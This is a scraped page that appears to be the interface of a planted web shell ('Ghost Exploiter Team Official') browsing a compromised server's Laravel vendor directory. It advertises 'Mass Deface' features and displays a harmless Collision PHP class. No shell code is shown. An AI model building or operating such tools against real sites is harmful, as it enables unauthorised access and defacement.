Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
nunomaduro
/
collision
/
src
/
SolutionsRepositories
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
NullSolutionsRepository
...
0.401KB
edt
ren
<?php declare(strict_types=1); namespace NunoMaduro\Collision\SolutionsRepositories; use NunoMaduro\Collision\Contracts\SolutionsRepository; use Throwable; /** * @internal */ final class NullSolutionsRepository implements SolutionsRepository { /** * {@inheritdoc} */ public function getFromThrowable(Throwable $throwable): array // @phpstan-ignore-line { return []; } }
<=Back
Liking